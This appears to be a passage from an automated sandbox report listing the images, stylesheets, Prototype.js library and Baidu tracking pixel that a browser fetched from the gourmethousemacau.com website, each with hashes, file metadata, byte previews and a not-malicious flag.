                                                                                                                                                              SSDEEP:48:3qUsI8Xiz5Sy27zLqltAFUr5UqkK9u9nwuacq5UhD7BO1/IkoozgNe:3qUsTXc5SyePqltAFUr5Uqt9u9nwPtmI
                                                                                                                                                              MD5:7E99E1159A3686F6AA4F90043C554483
                                                                                                                                                              SHA1:BD54DB91B81FA8A9EC37C93B10948DD8B690E4C4
                                                                                                                                                              SHA-256:81EA81BE1D862D36C34B6DC4F12AEFB87B656E319003263D8274974B48CCF869
                                                                                                                                                              SHA-512:AEF471830517267A4B5D4B9E7145B5B670ED8C068B61C806D67A6B386A274AA2BD991142F8A1E2896CB0BBF6C5024FA9DF224C0F2605581593D34B750273A6ED
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/images/loading.gif
                                                                                                                                                              Preview:GIF89a . ..........................444..............TTT...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!..NETSCAPE2.0.....!.......,.... . ........H......*\.p......h.p........."......8.....G>D).....R.4.C.....I....\..9p.....:.s...1_2`.p`...u.<.u...SY...k.`.F.hv..6S>u..+..ry..J./Q..M.0@.p_...+.+....../.KY&]......9..
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:Unicode text, UTF-8 text
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):1837
                                                                                                                                                              Entropy (8bit):5.0544725179383985
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:DlyxexX7SIOI+dHWWsd/YgLQZYQs9b/B8BmdmpcZ7hcTlST5Yl3ZPYl4a:D+elO9dvsd/Y5GQACxk6TlC5YZZPYOa
                                                                                                                                                              MD5:69ECEE76A05219654BAD136AA4057736
                                                                                                                                                              SHA1:DDDB53C76BFF10A13B2BAC2B72A27117044CE172
                                                                                                                                                              SHA-256:1AF434D56683820129E18DB10830A6D14F41CAF6321962A24872840ED4B1ED24
                                                                                                                                                              SHA-512:F76DCA1645165666FEDFBBC791F2D37AC4B129A8B52C177C5240BFF43EAABCEBAEECAAA4B5B18FF8116C297898E2D75F92A698C45E224A90A10A44D8159EA62A
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/m/static/css/index_ipad.css
                                                                                                                                                              Preview:@media screen and (min-width: 600px) and (max-width: 899px){./*----------------new product---------------*/. .new-products-box {. .padding: 30px 0;. }. .new-products-box h2 {. .font-size: 24px;. .line-height: 24px;. }. .new-products {. .margin-top: 20px;. }. .new-products h3 {. .font-size: 22px;. .line-height: 22px;. .margin-bottom: 14px;. }. .new-products p {. .font-size: 16px;. .line-height: 16px;. }. /*..*/. .product-left {. .margin-bottom: 14px;. .padding: 20px 0;. }. .product-left p {. .margin-bottom: 12px;. }. /*..*/. .product-right-top {. .margin-bottom: 10px;. }. .product-right .product-right-con {. .padding-left: 1rem;. }. .product-right-con .right-con-txt {. .width: 50%;. .padding-left: 1rem;. }./*--------------- ...... --------------*/...solutions-title img {..width: 30%;..margin: 0 auto 20px;.}..solutions-title h2 {..font-size: 24px;..line-height: 24px;..margin-bottom: 16PX;.}..solutions-title p {..font-size: 16px;..line-height: 24px;..margin-bottom: .08
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 59x28, components 3
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):506
                                                                                                                                                              Entropy (8bit):5.723315117064499
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:V/XPYhiPRd8jMvEF/liSEebuKnB9gNMi1RHLJPf:dkiPojMvEF/li1ebPnfPi1ff
                                                                                                                                                              MD5:F2B2AFBC6B36A611F64B7E631542E946
                                                                                                                                                              SHA1:7025247DAA734470513B824E3C2319929EAB1DAB
                                                                                                                                                              SHA-256:48D4FA05D63934904971675B19EF3F535C6F5D7C58EC10D3850BFAA5347C2EA7
                                                                                                                                                              SHA-512:AEDE3401F21204CCAF5A3D21C05974391250E5A0C1A1572480B1D0C23FE6EE4392460F54B24451FFFD3300EC63A1D050EB31823D22A5607ACF7FF1BD451E5444
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/images/menu_leftPic.jpg
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d...................................................................................................................................................;.............y.................................................................."......!1.AQ2B..........................AQ..1.."B................?..ye....p...8..3..F.. .@0.a..............9..mz.]6-..g.;..1...b{`....._.[kZtJ.t.T1Y..0........H}`.....*.W..eYGZ.-..?+):..~.{..G.Xk.2...n.c.j9R.P..T........
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 40x28, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):888
                                                                                                                                                              Entropy (8bit):7.033052540621042
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:dkiPojXUlHSSmL0ecu0rBe8XFho+fSbNa:Ki8kB+70x3
                                                                                                                                                              MD5:14B4ECF448E6CAF03AE0CEE94EDC88A6
                                                                                                                                                              SHA1:10F5C090B60FEC0ABEDAB2976E41A46E987C642B
                                                                                                                                                              SHA-256:3224CFB3896B46AF199849B05899A1B944D0015738A3FE1C201E3691401FC5C6
                                                                                                                                                              SHA-512:9CD2D8AA7EB884C97531DC3E55EA6C41FF3C79A42EF9816774DCA271D3FBD5840DD2BC2ABCD854AA45F357C6C5D656C0461369107AC8A5601F82C56023980821
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d...................................................................................................................................................(.............{.........................................................................".!..1A..a2B......................1!.AQa..q.................?..w...F."7...H..D.g7B.C....|..m....,(~.s...6.x...k........q#8.....}.._c.....u|...C...{..>.%)l....q.V..n........@..Q.5...7....M.....Eil.PL..a...# ..JG.+i..<U..?Z..J.,0..fG._PzJk`=p..=m].....-1..Bc..4...P+..........d...Mc_]$....j..YZ.$..Qk.Z.2.N..}..{.IXP.....'.O.V.......3.......[....C..5>.cbG...9..r..$....B.f........z.....?x...H....= ....% x;2?:....~..^s....I.b..&.O....f.m.l..-...p.PP..m.c.7.}eOz..Gl.nTy...1k~!.=Mq..S>.l..7........e....X......S C..L..m..[..<v.m.cM.)>{%..@?...yj&Q.H.ZDr.#..?..
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 40x28, components 3
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):1061
                                                                                                                                                              Entropy (8bit):7.236612630788841
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:dkiPojXbCAUbwjAAoMey6aCWUmABp55H+MLjyrDMjj4np:Ki8L1UboqkABpDhvy8u
                                                                                                                                                              MD5:602D9DCD2A1FBF892CDA6EF232164641
                                                                                                                                                              SHA1:4E73A4885FDF3EE8D8BECC95E5F4A63584DF59E0
                                                                                                                                                              SHA-256:3CB6D28B0D56198B2260F949B31D837BE154FADDC22EE47FFDDDE521E2FB6F92
                                                                                                                                                              SHA-512:C93A25D05BD8289A025EFBFA79205DC7CAA2580D08E2EDFA97FFFE0CF8C9A6A6F762371C94A7A62A7FC996E58171D98398D2B7A0FDB2248DEFCBA69EB581B280
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/images/menu01b.jpg
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d...................................................................................................................................................(........................................................................................"..!..1AB#a.2......................!1...Qa".A.....2Bb#3..............?..w..5...)M.R...7.J.l..x......`..t........2..zc.Y.5...o]..w_.(..|.}..@.z.3.G..iW.....L.P*.+k.V.q..:...{.y.%.%-..Y'.........roj*...HRK,.b....d....{W....pSwm.U..8.j...De....`....Z.R2..ZR=0....6.|K{.X..-%....d.,H.....*..8..R?.8K.W\..'.qerj..].Z..!...!..;....Kx..?]I./..n....%a|ui`..#....&.m.Br...q.....".......n+.a..`...D......C..'h......\xf..Q.l($jU.?.g.....)..b~'1.gX......uRdw Sw.6>...Xq...nP.Q8.k...r.[c.a..'.}j.b@.*.<..>B...&.H....d."4.....gY[$..C.#.:...k.....^5J.+FR.......I=k.W3.Ut.V.x.....m.-..C.6....6.....}5f...75<.....R.... F....g....r.NE.%C..X..Y..S...`......|.A..!..&.....2.bs.Mm3.*Q..k./..|H..X..].[.s
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 14x11, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):575
                                                                                                                                                              Entropy (8bit):6.159447138537591
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:V/XPYhiPRd8+r+5/MadRomxIoZAcPU4zx6g+V3vk6:dkiPo+r+5/MsRSc1zx6gUb
                                                                                                                                                              MD5:81B616B6367ED5D205A22B6E278E1A22
                                                                                                                                                              SHA1:F29BE87F216C2073EAC77BFD7E61F8EB90AF877D
                                                                                                                                                              SHA-256:34DAB49B17E7148EE1DA651E0593E146375C024167DF8E69CD91DE56ABBFE91A
                                                                                                                                                              SHA-512:5CA441A9DAF504A6125D32B7C3EB7CE6979F8EC1CC20EB8EC2AF80CFC510124D439ECD91730883D2C3362CC944126EA01B2D1032DE322E0470257D49D83A52FE
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d.................................................................................................................................................................y......................................................................!...Q2"B#3......................!..1Aq.Q..R..2b..............?...0]..7.S....+8EP:.........&..F.PB.A.0L...\..-.f....}z..1.!.....'..A.W.....PV|.._D...^...'0....17).4.4bSXx....5.L.9....|...Iw..-...u....55Ik.P.........5.R......./hD.V.n..A3...k.^..Q[..O|L.m.sH....R..c.!...............A...
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 14x11, components 3
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):570
                                                                                                                                                              Entropy (8bit):6.205497876671049
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6:3llVuiPjlXJYhg5suRd8vmMIj/lntEDltmEbc6hXmh6eg7zVo9EMbTezFqamOFrp:V/XPYhiPRd8+bjARnkgvVo9E0CIaGsWw
                                                                                                                                                              MD5:02D83B14468B986C6F01AE0D5BE2C4C5
                                                                                                                                                              SHA1:A04CADD5753BA0A00850A13CCA2AAD015721DFE1
                                                                                                                                                              SHA-256:2AAD93DD519944AD527FEE7BF72A7E86C5A95030EEA8579897B22D7565FB7CA5
                                                                                                                                                              SHA-512:B58DBCBA0E759E915D6154683D12912D1DE35B59CFA324CFC72CC7D21F257D41C846409B66D9AE5A770CD17790004B2CF13C1156AE8C5926EAC4FAB585A2CB8C
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/SysImages/Last.jpg
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d.................................................................................................................................................................w.....................................................................!....Q"2B......................!...1Qq.A...2Rb..............?..[.P....C....9]...wErK.f.nmanN.).T.R....T. s..LL....s9..C....HD....o.Z....|.'....#?.#>.7N"..E..&8.`.HR99T.Jw..!...jd4..#.Mk.9......U...Z.On.8G.wc.L.=..b..r.M..5Oh.:\]8S,$..........Ng.......&....\c.[....~.B?.x2.w./.....
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):47603
                                                                                                                                                              Entropy (8bit):4.842904257937552
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:768:bCggUtQwO1fgwfdZVYamcrkGYaFJ2OwvFfvoXPL8n49Qcs+yiYaVRHckEddDRbKm:zawO1RrQvALPyiYaVRHckEbDR+z9AHxp
                                                                                                                                                              MD5:EC266084ECE29EDE795DB38C9C8CBF3D
                                                                                                                                                              SHA1:8544BE1041CB59F5BACA815D83D729FE1810B2CB
                                                                                                                                                              SHA-256:2B2CE9D7522E5F9DBD46E5CF2DA01C04ABB232C10290FD2FA2B44DD77A7D9543
                                                                                                                                                              SHA-512:58585B14167364CC88C7C20453722A7AACF113B7D08D53CECDBD414093F94B2A56130A1A1E8AF29DC01B0041414ED2DD9E10A1706BD20408AE28FB4FA465B523
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/js/prototype.js
                                                                                                                                                              Preview:/* Prototype JavaScript framework, version 1.4.0. * (c) 2005 Sam Stephenson <sam@conio.net>. *. * THIS FILE IS AUTOMATICALLY GENERATED. When sending patches, please diff. * against the source tree, available from the Prototype darcs repository.. *. * Prototype is freely distributable under the terms of an MIT-style license.. *. * For details, see the Prototype web site: http://prototype.conio.net/. *./*--------------------------------------------------------------------------*/..var Prototype = {. Version: '1.4.0',. ScriptFragment: '(?:<script.*?>)((\n|\r|.)*?)(?:<\/script>)',.. emptyFunction: function() {},. K: function(x) {return x}.}..var Class = {. create: function() {. return function() {. this.initialize.apply(this, arguments);. }. }.}..var Abstract = new Object();..Object.extend = function(destination, source) {. for (property in source) {. destination[property] = source[property];. }. return destination;.}..Object.inspect = function(object) {. try
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 90x28, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1598
                                                                                                                                                              Entropy (8bit):7.542819000996718
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:Ki8mIS99RGs6oI4UeLK96Iih2dQn49WDH:+mI/olLK9w2i4Y
                                                                                                                                                              MD5:2EFF16DFDA75EB3A8E1EC996A9F66F56
                                                                                                                                                              SHA1:3B02A59FE67EB3DE7EF04A0B63CC053F59E27BB7
                                                                                                                                                              SHA-256:270B5E4E357A6C40E4E8A8344AC3D46F2CB113C1C384B45B736D1595292AD6D0
                                                                                                                                                              SHA-512:432972F1C4DDD90F085E5598811856CFF4A594C8C888F5B5C8DC7880BA25CC8E696A5F2E67933E29513586FC2202F7AB4AF70BF88F938093965131255015984A
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d...................................................................................................................................................Z........................................................................................!".1A.Qa2..q......................!1..Aa..Qq...."....2.............?.....%."_.%."_.%."_.)..,..(.L...!.sFd...Q.R.F......V1 .E.{.UK.D..K.E..N...5....|..c:xy,.uQ..@.<`a.G1.W+..J...Nt...\....z2.bK...V98.n.._1.y....gf...YK.UX.5Z...\......7c.:...R.2>mgU..I.e...d..f...*5Q.5..Q...u...).@....Z.h..'.....)q..qk..&4.....0.UB6.W.BjW.oO......x.....`..P.J.5...$.....kd=p.......65.._....+Zs}.....]...L.)dL.......y.OP..../.~/D...8.D.>Kc...{B.V..T..R.....oE..k...>U.xS.z=._<x...d...^..>5...BE.......Z.r*.G......t.....8..hY.vV..0[./....>.%0{..4...4..sX. .o...F".}....B#.........H.:.k.63/..R&J.g.2l.../..3#c.[[.T.UO.......c.....I....R5Vh...x\..F.$I|y....x.6....{..6...;...Q....N...C.M.......u.e.1..rB..
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=28, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=105], baseline, precision 8, 105x28, components 3
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):19377
                                                                                                                                                              Entropy (8bit):6.790638132156297
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:dYNMtKwZR4RdFY28y4lT7JYNMtKwZR4RdFVHknGPg4ZXwIKwrHHfDLlMhMl:dYNg7+D1PiZYNg7+DVEnGPg4ZXgwTlMg
                                                                                                                                                              MD5:7A2B6080F77A12467942786939C57BDA
                                                                                                                                                              SHA1:52D192134CA09B217F4BC1B43F71E5840E24AF21
                                                                                                                                                              SHA-256:368EB30E6208D691D698862CCA4A126C5B4F500D51B608287E651B2AE64666E0
                                                                                                                                                              SHA-512:1682E8C8929A394757E50581BC4DE39930CDF99E8672805584C4CEF8F9C791983BF1DBA7C20171B370E57B1AC3B3FE611D2CD2CB71D16B694F0B330AE31E0F42
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/images/menu05.jpg
                                                                                                                                                              Preview:......Exif..MM.*...............i.......................................................................................(...........1...........2..........i............. ............'.......'.Adobe Photoshop CS6 (Windows).2020:05:26 16:36:14.............0221.......................i...........................................n...........v.(.....................~...................H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS6 (Windows), datetime=2020:06:18 13:00:09], baseline, precision 8, 318x350, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):170351
                                                                                                                                                              Entropy (8bit):7.925817846328311
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3072:klRMzlRMGpyC13tAKHQyWqywo5lJm/A1Pq3cZZTI+GxSSZP510B1wh77Pr4:z19t7lyzZ+crI3R6B1w17Ps
                                                                                                                                                              MD5:3A41C10A587492478C97E6E5F1441C39
                                                                                                                                                              SHA1:DEF47AE2C39113C2A9CA59A83277CEF23CA2BBF1
                                                                                                                                                              SHA-256:9DEADD691D67EC2A20B54F7DA4E1E2FECD486D91CC57A41ABFAEAB2C992CEF0C
                                                                                                                                                              SHA-512:5A3C2CF264433BF700E21E61CDBD3B8DBD5FC1D39575FC29451992E65B1E7B614A3E723C4334EED987FBF7E47586E3E9E792A335A65520F2802EFE05DEF5F94D
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:....19Exif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop CS6 (Windows).2020:06:18 13:00:09..........................>...........^...........................................&.(................................0........H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch....
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):43
                                                                                                                                                              Entropy (8bit):3.0950611313667666
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:CUMllRPQEsJ9pse:Gl3QEsJLse
                                                                                                                                                              MD5:AD4B0F606E0F8465BC4C4C170B37E1A3
                                                                                                                                                              SHA1:50B30FD5F87C85FE5CBA2635CB83316CA71250D7
                                                                                                                                                              SHA-256:CF4724B2F736ED1A0AE6BC28F1EAD963D9CD2C1FD87B6EF32E7799FC1C5C8BDA
                                                                                                                                                              SHA-512:EBFE0C0DF4BCC167D5CB6EBDD379F9083DF62BEF63A23818E1C6ADF0F64B65467EA58B7CD4D03CF0A1B1A2B07FB7B969BF35F25F1F8538CC65CF3EEBDF8A0910
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:https://hm.baidu.com/hm.gif?cc=1&ck=1&cl=24-bit&ds=1280x1024&vl=913&et=0&ja=0&ln=en-us&lo=0&rnd=2010534784&si=3eff88a357a8c5aca6bb583a65de2875&v=1.3.0&lv=1&sn=31345&r=0&ww=1280&u=http%3A%2F%2Fwww.gourmethousemacau.com%2F&tt=Gourmet%20House%20Macau%20Ltd
                                                                                                                                                              Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):7367
                                                                                                                                                              Entropy (8bit):5.132939641171234
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:DQyDKPLGg9x/fB8/JOQR2ul62B5jUNSJUPJv2uJrvFw:DoWJOOd5jbJUPJ+6Fw
                                                                                                                                                              MD5:09A05BEC5AA5FB85D0F54CCC795AC5EE
                                                                                                                                                              SHA1:4235E140424D36D7065C234E459B5B583E6342B4
                                                                                                                                                              SHA-256:74018F5BD1A86685B4F6F3EB83007EFEAA675E0BC754EEEBA643C4668CB3EE72
                                                                                                                                                              SHA-512:C9345EE66B0CC065354676EC60FA7F21A82F2AE084996292A187045CC2932FADF691E1340E56961CA0801DF1B95331E7EC1C19D3C2D3197F3020FA739329922F
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/m/static/css/index_mobile.css
                                                                                                                                                              Preview:@media screen and (max-width: 899px){.. .. .swiper{.. width:100%;.. height:5.8rem;.. margin-top:60px;.. }.. .swiper-icon{.. top:2.5rem;.. color:#aaa;.. width:1rem;.. height:1rem;.. font-size:.6rem;.. line-height:1rem;.. border-radius:50%;.. background:rgba(22,22,22,0.1);.. }.. .swiper-left{.. left:5px;.. text-indent:-2px;.. }.. .swiper-right{.. right:5px;.. text-indent:2px;.. }.. .. .swaper-index{.. bottom:15px;.. }.. .swaper-index .indexs{.. width:20px;.. height:4px;.. overflow:hidden;.. margin:0 2px;.. }.... .swaper-index .indexs .myuse{.. height:4px;.. }.. .swaper-index .indexs .used{.. width:20px;.. }.. .. .uper-img{.. display:none;.. }.... .bottom-img{.. display:none;.. }.. .... /*----------------new product---------------*/.. .new-products-box {.. .padding: 30px 0;.. }.. .new-products-box h2 {.. .font-size: 20px;.. .line-height: 20px;.. }.. .new-products {.. .display: block;.. .margin
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 200x308, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):19266
                                                                                                                                                              Entropy (8bit):7.9613374796609415
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:384:UCjQidod0T/C8BROuQ7UmgDgixZ+JkK6Q908r/ixEqojqBlCjFeeKW:4id1nQYmBQ+GK60rxwCRLKW
                                                                                                                                                              MD5:6260F0C559FA4139416C4C065A67A852
                                                                                                                                                              SHA1:930CCEFF0B6D44714FF50747B3B09A7F81A19B96
                                                                                                                                                              SHA-256:2D649452452CA13E89CB6F2BBD930CFD91AFCBC298ED5F403E8478120F337856
                                                                                                                                                              SHA-512:1050BDFFCFA7C6B9358B572AA607776B35245F5EADB94BB563CA7027431C7849BDB83F3E4983989CAE754EC9216338928EB1AF65F1E87AF4DFA987CF66E70C03
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d.................................................................................................................................................4.............................................................................................!.1A..Qa.q."....2..BR#....b3$.W.r57....4%.&'G......................!1...AQ.aq.."..2.T......BR#.3.bD.............?..>.>......n]........Y.....ne.SN.~S*K.......t.`..3.L.i.=P...+.=.Y+Wr.Z..J.s3.$.$..........G.W.C.|..U....$.~..fw......OW..=(y/...t./....o.~....OW..=(y/...t....V..q;..~....OW..=(y c...?..I._.f.....]...~H........wG.rwH......G.]...~H...C.|..U....$n.....G.]...~H...C.|..U....$n.....G.]...~H...C.|..U....$.....G.]...~H...C.|...wD..H.>..&....Q..o.=_.? ......N.........G.]...~H.........C.G.?.&..............%.....}...t.8..j?b......G./J.K.d.G....>..q7..~....OW..~.<..-]......?.M.5/..........%../.....r7O.......z.$~A.C.|...t......o.~....OW..=(y/......s[.....uKP.X.N!
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 45x28, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):529
                                                                                                                                                              Entropy (8bit):5.919148557660297
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:V/XPYhiPRd8jbWvEglqeBrkEmfgjiWgHW1i/+Jh8n:dkiPojbaOgr/jidd/2h8
                                                                                                                                                              MD5:9CC6F13E6E398068F361A2F2F4623790
                                                                                                                                                              SHA1:77A6B29C896C1D924C59E0634F045B539AA36D3F
                                                                                                                                                              SHA-256:574F7EF63596A00D206B215C01E32191E590033EB3B0EA043678790C67ED6FF7
                                                                                                                                                              SHA-512:48FB2BC7FFABAD44D9EB0429E0A048C6BD155039483FCAAD10555F65FF05D605B1D8666121ED149DC90BC7AB35C7635F1F1CE31BEB8AB2632428B99F2D493A4D
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d...................................................................................................................................................-...................................................................................!."...qb..AQ..D.'.......................!.....1A"Bb...#..%............?..>Yp..x..x....#...........,......+..j.hUz..(i+....e....K..*.d..<.4..}.\*.uaV>...(...1.....4].s...sgzgv..a...\1.h.r30..b.S.4...z...i..o.......z.........7y...t....-...
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=308, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=200], baseline, precision 8, 200x308, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):126846
                                                                                                                                                              Entropy (8bit):7.9133105101536
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:ylsMlsxzRIoDlNIbkxg9yVFE7J9aJsAnTqDe9qHZLmwa5GjEATHXFE9HIdjkKz78:ylsMlsb5RFxbNpWSaZKt56E83eHCYWwp
                                                                                                                                                              MD5:53B2886E1DCDBED2430454078637545F
                                                                                                                                                              SHA1:B7B56473D38F2AB58553123B418548F9BAD20FB6
                                                                                                                                                              SHA-256:437AEAE11B711570FCD545E35D3A4F2211A984C7D12952F172F4765E19B2F2D0
                                                                                                                                                              SHA-512:AFB1E0E112C4B8DD9B24C8F0DD509C3765066189126893D3B5FCD1F44E6841375226D6ECE1B0BEDE8FF4AA5B59D79966E18FE3F839D79357A22428E0CA4C18CF
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:....0.Exif..MM.*...........................4...........................................................................(...........1...........2..........i............. ............'.......'.Adobe Photoshop CS6 (Windows).2020:06:23 10:40:43.............0221..................................4...............................n...........v.(.....................~...................H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=14, height=3744, bps=182, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS 5D Mark II, orientation=upper-left, width=5616], baseline, precision 8, 500x334, components 3
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):153460
                                                                                                                                                              Entropy (8bit):7.871276196790748
                                                                                                                                                              Encrypted:false
